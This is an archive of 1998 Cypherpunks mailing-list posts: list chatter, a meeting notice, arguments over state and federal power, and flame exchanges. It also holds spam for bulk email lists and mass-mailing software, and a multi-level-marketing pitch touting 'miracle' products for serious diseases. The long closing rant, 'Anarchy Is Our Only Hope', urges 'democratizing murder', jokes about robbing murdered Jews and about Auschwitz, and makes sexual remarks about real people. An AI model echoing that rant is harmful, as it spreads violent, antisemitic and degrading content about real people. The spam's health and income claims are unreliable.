                      NOTE: THESE ARE THE ONLY CARTRIDGES CURRENTLY INCLUDED
                                     IN OUR BUY BACK PROGRAM
               TO ARRANGE CARTRIDGE PICKUP CALL  CUSTOMER SERVICE (770)399-5505










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Dennis <jimd@starshine.org>
Date: Wed, 3 Jun 1998 09:03:50 -0700 (PDT)
To: Richard Threadgill <richardt@midgard.net>
Subject: Re: subscribe richardt@midgard.net
In-Reply-To: <richardt@midgard.net>
Message-ID: <199806031452.HAA08039@canopus.starshine.org>
MIME-Version: 1.0
Content-Type: text/plain




 Hey Richard,

 I think you may have sent this the wrong way.  You may want to 
 resend it.

 Here's a summary of the headers as I recieved them:


 From: Richard Threadgill <richardt@midgard.net>
 Subject: subscribe richardt@midgard.net
 To: cypherpunks-announce@toad.com
 Date: Tue, 02 Jun 1998 13:59:02 -0700
 Message-Id: <29466.896821142@yggdrasil.midgard.net>


--
Jim Dennis  (800) 938-4078		consulting@starshine.org
Proprietor, Starshine Technical Services:  http://www.starshine.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hugh Daniel <hugh@toad.com>
Date: Wed, 10 Jun 1998 02:48:05 -0700 (PDT)
To: cypherpunks-announce@toad.com
Subject: CYPHERPUNKS INVADE BERKELEY!  June 98 Physical Meeting Announcement
Message-ID: <199806100948.CAA04922@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



June's meeting will be at Soda Hall in Berkeley, near Hearst&LeRoy.

There's a map at http://www.berkeley.edu/campus_map/maps/ABCD345.html

Ian has reserved the 4th floor lounge and the adjacent patio in Soda
Hall on 
the UC Berkeley campus for the June 13 meeting.  There's power,
whiteboard,
and Metricom coverage in the room.  If there are computer demos
needed, we 
can go down the hall to my office.

The biggest problem will be parking; Ian is having the staff here look
in to 
that, but he may need to know _in advance_ who's going to need parking

permits.  Otherwise, you'll have to pop out every so often to feed the
meter.




				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hjfdujf@juno.com
Date: Sun, 14 Jun 1998 20:17:41 -0700 (PDT)
To: Friend@public.com
Subject: A Unique Email Advertisement
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


HELLO
The following information is not meant to spam or upset anyone, that is why we include
Advertisement in the subject line to give you an option to delete before you open the
message. We are a Reliable Internet Company that does full Internet Marketing. 
Whatever your needs to market your business or product, A.I.M. can help you achieve
your success. Please do not treat this as just another piece of junk mail, we are Aimed to
your success.

A.I.M. was established in 1994 and has helped many people on the
Internet market their business and products successfully.  We do not sell random bulk
email lists, nor do we advertise Adult Sites or Chain Letters.

Right now the largest form of communication is done through the Internet, and 1998 will
be  another record breaking year.  There are over 60 million people that have Internet
access world wide, and that number continues to rise at a rate of over 40,000 per month. 
The best way to market any product or service is through the Internet, and random bulk
mail is not the way to go.  You may ask, why am I sending you this ONE piece of email;
to get my information out so that others can follow the same practices of Internet
advertising.  The Internet community would benefit from direct advertising!

Now you ask what can we offer you.....

CUSTOM TARGETED EMAIL ADDRESSES
No matter what your target is, we can compile a great list for you of people or businesses
that are interested in what you offer. Say, for instance, you would like to send a newsletter
out to people interested in MLM; we can compile a list for you of people currently
involved in MLM.  If you would like a list of people looking for a business opportunity,
we can compile that list for you. You tell us your target; we will compile that list.  We can
even target your list geographically.
example...If your business is selling CD's, and your company is based in NY; we can
gather a list of people in NY interested in CD's.  We have a client that is involved in
MLM, who asked us to target 1000 opportunity seekers to start.  To his surprise he got 7
new people in his downline from just that one mailing.  Another client wanted to send a
letter out to birdwatchers.  We targeted 5000 birdwatchers for him; and he, also, became a
very happy client of ours. We have targeted.. investors, businesses, International
addresses,women, men, age groups, cites, states, doctors, lawyers, etc....

Some of our clients are getting results of 1-40%.  Targeted mailings start at $50 per
thousand, and we can offer you a better price at higher quantities.

Complete Pricing for Targeted Email

1000 targeted email addresses $50 for us to email $50=$100
2000 targeted email addresses $85 for us to email $85=$170
5000 targeted email addresses $250 (no charge for us to email)
10000 targeted email addresses and we mail $500
100000 targeted email addresses and we mail $1,000
1 million  guaranteed targeted email addresses and we mail $5,000
We offer a guarantee that our lists will be targeted to your topic.  We keep a master file on
all of our clients so if you order again you will never get any duplicate addresses from us

EMAILING
We can do the email for you and have all of the replies come directly to your email
address.  If you prefer to do the mailing yourself, we sell email software as well.
Here is a few:
Rapid Fire Mail Server....Turns Your Computer into a mail server $495.00 (free demo)
Stealth Mass Mailer...Sends out email at a rate of 100,000+ per hour $395.00(free demo)
Mail Pusher....The newest in Bulk Email Software (great program) $300.00 (free demo)


OTHER SERVICES OFFERED BY A.I.M.

WEBSITE MARKETING PACKAGE

We can place your website to the top of any given search engine. Our best results come
from Infoseek.
Guarantee top 10 listing.
$300.00  first month  $300.00 every month there after

COMPLETE WEB MARKETING PACKAGE

(1) Targeted Emails in the amount of 200,000 per week
(2) Posting your website to BBS (Internet Bulletin Board Systems Related to your topics)
(3)  URL links to other sites related to your topics
(3) Newsgroup Postings (1000) per month
(4)  Banner Ads to related subject searches
(5) Website Submissions to the search engines with a guaranteed 1st page placement to
Infoseek and submissions to the other top 8 as well as 400 other search engines

All of the postings, submissions, banner ad and URL advertising will be done with your
reply email address so that you have a copy of every placement and you know where your
ads are on the Internet.


Total price for complete marketing package $2500.00 per month

IF YOU have a business, product, or just want to get your information out; you have no
need to look any further.  A.I.M.  is here to help!!  

Now as you can see we are a full service company, and we can help you with any of your 
advertising needs.

Please call us toll free at 1-800-942-7913 today!


We look forward to hearing from you and are happy to answer any questions that you may
have.  Once again, we give you our guarantee that this is the only piece of email that you
receive from us. We wish you success now and in the future!

Again our toll free number is 800-942-7913
our fax # 732-367-2229

We accept...Visa/MasterCard/American Express or check by fax

Thank you









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mvhs5 <mvhs5@comnett.net>
Date: Sat, 7 Mar 1998 12:18:07 +0800
To: cypherpunks@toad.com
Subject: stroke the toad.
Message-ID: <35B44855.760@comnett.net>
MIME-Version: 1.0
Content-Type: text/plain



pitch a tent




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Burnes <jim.burnes@ssds.com>
Date: Wed, 1 Jul 1998 08:34:32 +0800
To: Jim Choate <ravage@einstein.ssz.com>
Subject: Re: saving the world from a cancerous monopoly (fwd)
In-Reply-To: <199806302318.SAA15079@einstein.ssz.com>
Message-ID: <3599832A.4D0E49E3@ssds.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate wrote:
> 
> 
mjg says:
> 
> > Yes, I've thought of that too. That is the place to start, but I think
> > the federal government is too strong -- eventually the states will hit a
> > stand-off and the succession issue arises again. Feds won't go down
> > without a fight.
> 
> That's actualy an easy one. All it would take is a govenor to declare that
> citizens of his state are not going to submit to annual taxation. I
> guarantee that things will move quickly. Since the National Guard requires
> the ok of the govenor for the feds to invoke that is pretty much a moot
> point. It's clearly unconstitutional to involve the Army, especialy if it is
> made clear the National Guard will be there at the border to stop them. As
> to the FBI and such, have the Sherrif in each county and he state police
> proceed to arrest any such persons who attempt to invoke their federal
> authority.
> 

Since the National Guard is an extension of the Army and was created
through the federal authority of raising armies it is not 
necessary for the Governor of any state to be consulted before it
is given its orders.  So says the Supreme Court several years ago.

The all happened when Dukakis challenged George Bush's power to
mobilize his National Guard during the Persian Gulf war.
(operation Just 'Cuz).  Dukakis was pissed (thinking he lived
in the old US) and challenged the whole thing.  He lost.
He mistook the state militia for the National Guard.

As far as the unconstitutionality of the Army doing anything,
thats history -- all they have to do is invoke the Drug laws
and the constitution is null and void.  In any case, the National
Guard is the Army (for all practical purposes).

As far as arresting federal authorities goes, there aren't
enough sherrifs lying around to stop even FBI agents, much less
the National Guard. (state police included)

Where were the sheriffs when the BATF broke assuaulted
the Branch Davidian church?  The answer is: helping them...



> 
> Speaking of brain-washed....
> 
> They didn't fear democracy, they feared an authoritarian central government
> without the states exercising their authority to stop it via the 10th. They
> felt that democracy was the only way to deal with this sort of excess.
> 
>In short, they celebrated democracy.

Actually they feared an excess of both.  Tryanny of the king and
tyranny of the masses -- mobocracy.  That is why the Senators
were appointed by the states and not elected by the people.  It
was an effort to allow states to control their interests instead
of everthing being determined by congress.  This is known as
a balance of power.

jim




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Wed, 8 Jul 1998 10:40:31 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Rats in the Walls
In-Reply-To: <199807021721.TAA23458@basement.replay.com>
Message-ID: <3.0.5.32.19980703155145.008b4820@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain



At 07:21 PM 02 07 98 +0200, Anonymous wrote:
>"Reeza!" <howree@cable.navy.mil> wrote:
>
>> At 04:41 PM 02 07 98 +0200, Anonymous wrote:
>> >and there are indeed safe havens elsewhere,
>> >
>> >"Educate, don't Agitate"
>> >
>>
>> Tell me more,,,
>
>You and who's army?
>

What army? 
I'm in the navy, and I'm getting sick of it.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Mon, 13 Jul 1998 09:32:44 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: web site on 18 yr olds losing virginity
In-Reply-To: <199807120303.UAA02103@netcom18.netcom.com>
Message-ID: <Pine.BSF.3.91.980711010406.27979C-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




Either "stopthis1" is a clever marketer drumming up interest in this 
site, or the christian coalition has become inbred to the point of 
unbelievable stupidty. Any bets?

On Sat, 11 Jul 1998, Vladimir Z. Nuri wrote:

> hmmmmmmm, just to show you the possibilities of cyberspace and
> what it's coming to
> 
> 
> From: stopthis1@juno.com
> Date: Sat, 11 Jul 1998 02:25:08
> Subject: 2 kids to lose "virginity" LIVE on the Internet
> 
> Please join me in shutting this website down.  
>  
> http://www.ourfirsttime.com 
>  
> I caught my grandson and his friends giggling over this website 
> where it says two 18 year old kids are going to lose their 
> virginity - LIVE on the Internet. 
>  
> Just because these two idiot kids saw a woman give birth LIVE on 
> the Internet, they have decided that anything goes and will have 
> sex for the first time on the Internet. What has the world come to 
> when people can do absolutely any lewd and deviant thing they want 
> to, and let innocent children watch on their computers. 
>  
> They are mocking the sanctity of marriage. What concerns me the 
> most is there are no controls on this website to keep children 
> out.  Please send a protest email to your congressman or senator, 
> and ask them to "SHUT THIS OBSCENE WEBSITE DOWN" !!! 
>  
> Click here to go to the Christian Coalition's page of email 
> address for all Congressmen and Senators. Find your representative 
> and demand their help to stop the Internet from being prostituted 
> by brain damaged sex maniacs. 
>  
>          http://www.christian-coalition.org/ 
> Email Guide to Congress from the Christian Coalition 
>  
> Also send emails to the following individuals asking for their 
> help to shut this site down - 
>  
> President Clinton   -   president@whitehouse.gov 
>  
> Jesse Helms   -   jesse_helms@helms.senate.gov 
>  
> Newt Gingrich   -   georgia6@hr.house.gov 
> 
> Jerry Falwell   -   chancellor@liberty.edu 
>  
> Pat Robertson   -   cbnonline@cbn.org 
>  
> Christian Coalition   -   coalition@cc.org 
>  
> Praise the Lord and pass this on to all.  
>  
>  
>  
>  
>  
>  
>  
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: success26@apexmail.com
Date: Mon, 20 Jul 1998 17:20:33 +0800
Subject: Need Large Income Fast??
Message-ID: <46788335@merits494.net>
MIME-Version: 1.0
Content-Type: text/plain



Dear Prospective Entrepreneur;

I have been an attorney for 26 years, but recently I
joined a company which is only 3 years old, and is 
growing at a fantastic rate; in fact, after only 10 
months old, it was featured in SUCCESS MAGAZINE, and
it has been the #1 rated network marketing opportunity
for the last three years.

What makes this company and this opportunity I am 
offering you so great, is the fact that we (Marketing
Executives) have "EXCLUSIVE" marketing rights in the 
United States to new miracle products that are
providing dramatic benefits to people who have two of
the worst diseases known to mankind.  Americans who
learn about and need our products, can only get
them through us, and not from other companies, or the
corner drug store.

After getting into other companies in the last several
years, and going from company to company, and product
to product (mostly companies that failed, or had falsely
advertised products), I finally found this company that 
is truly "CREDIBLE," has tremendous products, a great
compensation plan, and, best of all, my customers are
calling me back month after month.

Since the products actually sell themselves, I'm NOT
constantly on the phone, or forever hustling all my
relatives and friends. Products that make people feel
better (especially natural products that have no side
effects, and do have a 60 day money back guarantee)
cause people to call me every month, instead of me 
calling them.

Our "exclusive" and "patented" all natural products
have also gone through the double blind clinical 
studies and have produced unbelievable sales in foreign
markets, and have only recently been introduced into
the United States, so our timing is also perfect.

If you are interested in trying our products and/or
looking at this business opportunity, call me toll-free
at 888-203-6668 and leave your name, telephone number,
and/or your address if you want more information. You 
also can respond to this e-mail if you so wish.

If you are ready to make some changes in your life, free
up some time to spend with your family, and make some
extra money, call me or e-mail me.  WHAT HAVE YOU GOT TO
LOSE?  I made that same call a few months ago, and I 
promise, you will be happy to hear more about this tre-
mendous company, its great products, and about how easy 
it will be for you to make that extra money.

Thanks, 
Clyde Fontenot


This message is brought to you from Clyde Fontenot, 
Attorney, 504 W. Main St., Ville Platte,LA.70586,
318-363-5535.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@clueserver.org>
Date: Mon, 27 Jul 1998 01:33:59 +0800
To: "Robert A. Costner" <pooh@efga.org>
Subject: Re: [FP] NHTSA - Digital Image Photo Licenses
In-Reply-To: <3.0.3.32.19980726120135.03892610@rboc.net>
Message-ID: <3.0.5.32.19980726102743.04234220@clueserver.org>
MIME-Version: 1.0
Content-Type: text/plain



At 12:01 PM 7/26/98 -0400, Robert A. Costner wrote:
>
>The following is taken from today's SCAN newsletter.
>
>======================================================================
>SCAN THIS NEWS
>7/26/98
>
>Following is a brief excerpt from the -
>
>"U.S. Department of Transportation"
>"National Highway Traffic Safety Administration"
>
>"The Highway Safety Desk Book"
>
>regarding digitized driver's license photos.

[snip]

>The implications for law enforcement go far beyond these obvious benefits.
>With a central image database of every driver in a state, the public safety
>community has a ready-made storehouse of photos to be used in criminal
>investigations.....

Oregon already has this.  (We seem to be an official beta test site for
every draconian measure or propaganda campaign they want to implement on a
national scale.)

The digital licensing program hear was VERY expensive and full of cost
over-runs.  If your state legislature tells you it can be done inexpensivly
or is a "cost cutting measure" they are lying their asses off.
---
|              "That'll make it hot for them!" - Guy Grand               |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.ctrl-alt-del.com/~alan/       |alan@ctrl-alt-del.com|




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Mon, 3 Aug 1998 07:29:25 +0800
To: Anonymous <nobody@replay.com>
Subject: Re: Paul Merrill, his eyes uncovered! (or so he claims)
In-Reply-To: <199808022219.AAA09511@replay.com>
Message-ID: <Pine.BSF.3.91.980731230242.12499A-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




Or you could get back on your medication.


On Mon, 3 Aug 1998, Anonymous wrote:

> On Sun, 2 Aug 1998, Paul H. Merrill wrote:
> 
> > Never has a single missive opened my eyes so thououghly.
> > 
> > First, I had always thought that libertarians were somewhat equivalent
> > to my personal philosophy of Rational Anarchism.  Thanks to your pearly
> > prose I now know that libertarians are not rational.  I attribute my
> > failure to notice this in the past to the plethora of
> > pseudo-libertarians (like Tim May) that have a brain and can say
> > something beyond "What I want is right and you are wrong".
> > 
> > Second, I now recognize fully the signs of masked inferiority.  Any
> > attempt to allow the unwashed masses access to computer technology is
> > met with contempt and belittlement.  Personally, I do not fear what
> > others may be able to accomplish if they have a tool that they have the
> > ability to use.
> 
> Despite your mentality, I resist the urge to hope that you should learn
> from practical experience what is apparently eluding you. That would
> probably take the general form of you being in an automobile accident and
> getting killed because the idiot who stops to "help" you attempts to do
> CPR the Hollywood way and tells somebody who actually knows what they're
> doing that he can handle it. 
> 
> Because I expect people to have basic knowledge above and beyond clicking
> a mouse, pushing buttons on a television remote, mixing vinegar and baking
> soda, and learning CPR by watching Baywatch, I'm suffering from "masked
> inferiority."
> 
> Thank you for opening my eyes, Paul. I will now flush years of higher
> education down the drain and become like the "common man" so I'm not
> accused of exhibiting signs of "masked inferiority." When I'm trying to
> wash mold off my house and make a "jiffy mold remover" by mixing ammonia,
> chlorine bleach, and a plethora of other things, thereby releasing toxic
> gasses and quite possibly causing the barrel it was in to explode throwing
> shrapnel all over the block, I'll claim ignorance. 
> 
> Or maybe somebody can practice medicine by asking for "fifteen cc's
> anaprovaline" in emergencies because they heard it on Star Trek. 
> 
> Or maybe I could use large quantities of butyric acid to scare dogs away
> from my home. When the neighbors complain, I can claim ignorance. Of
> course, the area might be uninhabitable for a while. Phew!
> 
> After all, ignorance is what is prized in this society. The techies are
> just somebody to pay when you need them, and make fun of and assault the
> rest of the time.
> 
> > Third, reality has never seemed to be a strong-point with libertarians,
> > but now I see that the disregard for reality an asset in your book. 
> > Because the reality is that most of those poor folk out there can't use
> > UNIX.  Not won't, can't.  Their phobia does not allow it, just as your
> > phobia does not allow you to consider any possible way that they might
> > gain even a fraction of the power of the Information Age that you
> > already have.
> 
> So these people now are "victims" of a "phobia" which prevents them from
> reading documentation and bothering to educate themselves. If you don't
> want to claim ignorance, claim that you're a victim; it always works these
> days.
> 
> They can gain all the power they want. It's when they walk in with an
> assault rifle in each hand and start spraying the room randomly with
> cluelessness-inducing ammo that people get mad.
> 
> If in doubt, claim you are a victim of this widespread epidemic known as
> "phobia of clue."
> 
> > Fourth, while I am a whore and will run or build any system that someone
> > is willing to pay me to, I do have my limits.  I know longer accept
> > contracts or employment related to the military and intelligence
> > communities.  Neither, do I sell my body.  I leave that to the wannabe
> > geeks like yourself.
> 
> I think you're suffering from denial, Paul, and that you're lashing out at
> anybody who could be a threat to your business because of masked
> inferiority.
> 
> > 
> > Again, Thank you for opening my eyes.
> 
> No problem. Don't mention it.
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shizheng <fa888@kali.com.cn>
Date: Sat, 15 Aug 1998 15:59:08 +0800
To: "cypherpunks@toad.com>
Subject: what?
Message-ID: <199808150748.PAA10057@public-px.online.sh.cn>
MIME-Version: 1.0
Content-Type: text/plain








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: james pack <j-dpack@foxinternet.net>
Date: Mon, 17 Aug 1998 10:18:50 +0800
To: cypherpunks@toad.com
Subject: persones who are cool
Message-ID: <35AE8C4A.CEE@foxinternet.net>
MIME-Version: 1.0
Content-Type: text/plain



i know  lets trade j_d@foxinternet




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Date: Wed, 1 Jul 1998 00:58:35 -0700 (PDT)
To: cypherpunks@toad.com
Subject: http://bureau42.ml.org
Message-ID: <009C8814.0F703E40.5@west.cscwc.pima.edu>
MIME-Version: 1.0
Content-Type: text/plain



I have been getting a lot of requests from people who want to
know how to get more of the manuscripts of the 'True Story of
the InterNet' series which is sometimes spammed to the CypherPunks
Disturbed Male LISP through my account by some inconsiderate psycho
who has no respect for Bob, who asks only that he be given 'space'
NOT 'SPACE ALIENS' you
stupid fucks!!!
try http://bureau42.ml.org

Please quit bothering me (except for Attila-I like my sex 'rough',
whereas the Author seems toli
like hisorher sex 'ruff, ruff').

Linda Lou Reed
"If you meet the Author on the road, KILL HIM!!!"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Date: Wed, 1 Jul 1998 04:04:35 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Anarchy Is Our Only Hope... - SPACE ALIENS HIDE MY DRUGS!!!
Message-ID: <009C882E.0B003B20.1@west.cscwc.pima.edu>
MIME-Version: 1.0
Content-Type: text/plain


~NOTE: If this article is digitally signed, then it is not
       guaranteed by the Electronic Forgery Foundation to
       be Genuine FUD.
       The Electronic Forgery Foundation, as a matter of 
       policy, accepts no responsibility for digitally 
       signed manuscripts which may actually be MainStream
       News Articles containing factually accurate and
       officially verifiable lies.

                   Bienfait Nutly News
                "ANARCH IS OUR ONL HOPE"
                    Christmas Special
                    *****************
                    by King Author and the Dark&Stormy
                    Knights of the Magic RoundTable

[College Station Nudist Colony]IT WAS A STARK NAKED AND COLLEGE
dormy night...

[Prudential Annex, Alcatraz]JIM BELL STRUGGLED TO HOLD BACK THE
small bead of sweat that was beginning to form on his brow as
he feigned indifference while the Warden reviewed his application
to form a prison swim team...

[Oklahoma City]amADbOMBERtObEnAMEDlATER CREPT UNDER THE FENCE
surrounding the former site of the Murrah Federal Building. As
he placed the explosive charges at strategic points among the
rubble, he couldn't shake the feeling that government spin-
doctors were already preparing to issue a statement clarifying
that BATF agents were absent from the site at the time of the
explosion as a result of having moved to new offices, while 
the innocent children, air-lifted to the sight shortly before
the tragic act of terrorism, were part of an educational tour
that had been scheduled months previously.
He shook off his fears, reminding himself that Louis Freeh,
Janet Reno and Michael Fortier had planned everything down 
to the last detail...

[Austin, Texas]THE BARMAID AT THE HEB CENTRAL MARKET CAFE WAS
certain that she had seen all of those attending the alleged
Austin CypherPunks Physical Meeting in a variety of local
theatrical productions over the years.
It didn't make sense. Why would someone hire a rag-tag group
of actors to impersonate members of an anarchistic, crypto-
privacy InterNet mailing list?
And who was the strange character from the Bay Area who
occassionally attended the meetings? She remembered seeing
him at Stanford during the visit of the SexCriminal and his
MainSqueeze to convince their daughter, Chelsea, that dating
a man who was stalking her father with a Stihl chainsaw could
have negative political reprecussions, and that she didn't 
need that fucking psycho's reassurances as to her sexuality,
since daddy also thought she had a great ass, and was not just
saying that because she was his daughter.
Stanford wasn't the first time she had seen the Bay Area 
visitor to the CypherPunks meetings. She had also seen him
leaving the Texas Book Depository in Dallas, shortly after...


Anarchy is our only hope...

  Lone gunmen and unabombers are Dog's way of telling us,
as we stare at a meaningless election ballot, that we could
have had a V-8, pretending that we were drinking the blood
of a single innocent child we had slaughtered in an act of
random violence with an M-16, or in the bombing of TWA-800,
or any one of a variety of mind-numbing reminders that we,
as well as the cargo on our flight, are just numbers, that
can be erased with the stroke of a pen, or a flash of light
and a loud bang...

Anarchy is our only hope...

  Face it, the System isn't working...
  We need to Democratize murder, once again putting it in
the hands of the common people. People with wooden or stone
clubs; people with Saturday Night Specials; people with
knives in kitchen drawers, directly behind the freezer
door that their fat, lazy spouse is staring into, wondering
which gallon of ice-cream to eat first; people with access
to both the drug-cabinet and the maternity ward, who realize
that the solution to child-crime is stopping it at its very
source...
  The process of natural selection, which decrees that only
the strong AND lucky survive, has been derailed by social
and government interference that leads to genocidal policies
which mark our fellow humans for deletion on the basis of
race, religious and/or ethnic background, political beliefs,
ownership of land which has oil or mineral reserves underneath 
it, use and development of strong crypto, ad infinitum...

  It used to be that those with strong survival instincts,
finding themselves short of funds, could beat up and/or
murder a Jew, pulling out their gold fillings in order to
make it to their next paycheck.
  Once government got involved, the average Joe and Jane
couldn't hope to compete with the streamlined merger of
thousands of ignorant thugs into a single giant bully.
  It was a step backward for the JesusKillers, as well,
since they had a fighting chance against the more ignorant
members of the light-skinned races, who didn't realize
that it didn't really help for them to hide in dark alleys,
as well as members of the dark-skinned races who couldn't
resist smiling in the dark when a potential victim approached.
  Once ethnic discrimination was declared to be a function
of government, there was no need for Official Thieves Thugs
And Murderers to hide in dark alleys, since they could herd
their victims into railway cattle-cars by use of official
government brochures promoting Auschwitz as a Health Spa
with state of the art shower systems guaranteeing not only
hygenic cleansing, but also eugenic cleansing. Those who
enquired as to the meaning of 'eugenic cleansing' were
told that it would become clear upon their arrival...

Anarchy is our only hope...

  A passage in a work by one of the true literary genius'
of the InterNet (whose name I can't remember, but the work
was titled, "InfoWar") pointed out a period during which
violent crime was rapidly decreasing at the same time that
public perception of the rate of violent crime was reaching 
an all-time high.
  A parallel poll, commissioned by the People Against
Humanity division of the Synics Cociety, revealed that not
a single person taking part in the other poll believed
themself to be an ignorant, societally programmed moron,
incapable of anything beyond sucking up whatever slop
MainDream News Farces chose to throw into the public
media troughs for consumption by those who believe that
the High Cost Of Rational Thought is an unbearable burden
that will leave them too poor to add the 24-Hour Drooling
And Slobbering Channel to their cable package.
  
  Anthropologists specializing in the rise of civilized
society have discovered that a solitary recluse living
alone in the wild, will, upon drooling and slobbering on
HimOrHerSelf, instinctively realize that, if they continue
to do so, then the chance of their ever developing the
ability to walk upright becomes radically diminished.
  At the same time, modern research indicates that if test
subjects from current society are exposed to pictures of
Michael Jordan drooling on his shoes, that manufacturers
can add a hundred dollars to the price of their sneakers
by adding artificial saliva-stains to them.

Anarchy is our only hope...

*************************************************************
        WE ARE INTERRUPTING THIS PREVIOUSL SCHEDULED
        BROADCAST TO BEING OU AN IMPORTANT NEWS FLASH
        
        The Author, undoubtedly affected by solar flaring
        reflecting off of the early evening moon, suddenly
        realized why Leslie Stahl seemed so nervous during
        last night's '60 Minutes' piece on InterNet FUD,
        titled, 'The Rumor Mill.'
        It was not, as he originally suspected, Ms. Stahl
        psychically picking up on his efforts to peek up
        her skirt, and was, in fact, not the Scent of a 
        Woman, but the Scent of Fear...
        
        Fear that Jane and Joe Sheeple, empowered by InterNet
        Search Engines capable of catering to their true 
        desires, instead of attempting to mold their desires
        to fit the hidden agendas of Stahl's CBS controllers,
        might actually choose to access J. Orlin Grabbe's
        'World's 50 Greatest Conspiracies' website, and
        compare his 'information' with the 'information'
        provided by '60 Minutes'.
        
        Fear that a generation of people who had grown up
        believing Walter Cronkite when he ended his news
        casts with "That's the way it is...", would suddenly
        begin wondering why Wally never told them that Jack
        Kennedy, their beloved President, was screwing the
        living shit out of Marilyn Monroe, ending his news
        cast by making a circle with the forefinger and
        thumb of his left hand, poking his right index
        finger back and forth through the circle, and
        saying, "That's the way it is..."

        Fear that Marilyn Manson, whining on Public Radio
        about 'The Rumor Mill' on the InterNet spreading
        'lies' and 'disinformation' about HisOrHer tour,
        would be recognized by those paying attention as
        being strikingly similar to Ms. Stahl's whining
        on '60 Minutes' about the 'lies' and 'disinformation'
        being spread by people who had different beliefs
        about Reality and Truth than those that she held.
        
        Fear that vague hints about "Junk," "Regulation"
        and "Online Policemen" were not strong enough to
        truly get her point across, while indulging in
        violent screaming calling for hanging J. Orlin
        Grabbe by his hairy balls for disagreeing with
        her WorldView would only confirm viewer suspicions
        that she was in the same league, although on a
        different team, as Marilyn Manson, who believed
        that some kind of "censorship" was needed, to
        prevent the ChoirBoys at Ms. Stahl's church from
        spreading Christian Right lies about HisOrHer
        tour on the InterNet, while waiting their turn
        to insert their young, hard, throbbing cocks
        into a member of the congregation who was a
        regular correspondent on a major television news
        magazine show.

        Fear that the Author, currently working on the
        development of a forged Leslie Stahl's HomePage,
        had a 50-50 chance of correctly guessing whether
        or not she was wearing panties...
**************************************************************
        WE NOW RETURN OU TO THE REGULARL SCHEDULED BROADCAST
**************************************************************
                NO WE DONT...
**************************************************************

  Someone drinking Dirty Mothers wrote the stuff above, last
night. Maybe it was me...maybe it wasn't...I woke up with a
headache.

  Regardless, reading today's posts to the CypherPunks list,
it soon became apparent that my clever ruse, pretending to
be intellectually superior to the other list members, worked!
  The real purpose of my egoistical diatribe was to ferret out
the list members not truly deserving of being on the same list
as the rest of us, who are using 11% of our potential brainpower.
  I knew that the Pretenders to our elitist level of being, being
insecure, insecure enough to avoid repeating repeating their
words, would accuse *me* of being insecure.

  Sure enough, the Pretender was exposed, and now we *all* know
that the Pretender on the list, whom we are all superior to, 
is...
  Nobody!

  In retrospect, we were fools not to realize it long ago. All 
of the signs were there...
  The self-effaceing alias, 'Nobody'.  
  The inability to reflect a CypherPunks Consistent Net Persona.
  Always posting from different accounts: Juno, Replay, 
  HugeCajones, CypherPunks, Dev.Null...
  The propensity for taking wildly varying stances on the same
  issue. 
  Overcompensating for HisOrHer lack of self-worth by always
  demanding credit for HisOrHer posts, and never posting 
  Anonymously...

  I was surprised that the rest of the list members never 
figured it out.
  I guess I'm smarter than the rest of you...

**************************************************************
        OK, *NOW* WE RETURN OU TO THE REGULARL SCHEDULED
        BROADCAST--*REALL*-I *MEAN* IT THIS TIME!!!
**************************************************************
        ACTUALL, I FORGOT WHAT I WAS TALKING ABOUT, SO
        I THINK I'LL JUST TR TO EXPLAIN A CONCEPT I WAS
        THINKING ABOUT ESTERDA, BUT NEGLECTED TO ADDRESS:
                ANARCH IS OUR ONL HOPE...
**************************************************************

  Uhhh...
  I hate to appear to be a fucking idiot, incapable of
sustaining a logical train of thought, but I just reached
the PointOfEnlightenment that comes around 4 a.m., when
one is out of beer and beginning to sober up, and looks
at the orange sitting on their desk and sees...an orange!
  Not the cosmically meaningful macrocosm/microcosm orange
that seems to hold the key to the secrets of the universe
when one is high on acid. Not the orange with a bit of
green-stuff starting to show on its surface when you look
at it at the end of another long, hard day at the Salt
Mine, whereupon you chastise yourself for letting it go
bad before eating it, because your tired, acheing bones
remind you that you are living in a cold, hard world.
  No, it is the orange that both the pragmatist and the
mystic see at 4 a.m., about an hour after the last beer
is gone, and the liquor store doesn't open for another
few hours. The *real* orange...

  Anyway, 'Anarchy Is Our Only Hope...' is one of those
Deep Truths (TM) that are important to attempt to explain
to the unenlightened, who quit doing acid in '72, and now
have regular jobs.
  But, Fuck It (TM)!
  SPACE ALIENS HIDE M DRUGS!!! was always intended to be
my autobiography, but somebody else started it (although
